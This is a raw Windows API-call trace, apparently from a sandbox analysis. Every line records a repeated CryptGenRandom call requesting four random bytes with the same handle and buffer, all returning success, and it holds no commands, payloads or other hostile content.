[0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.900] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 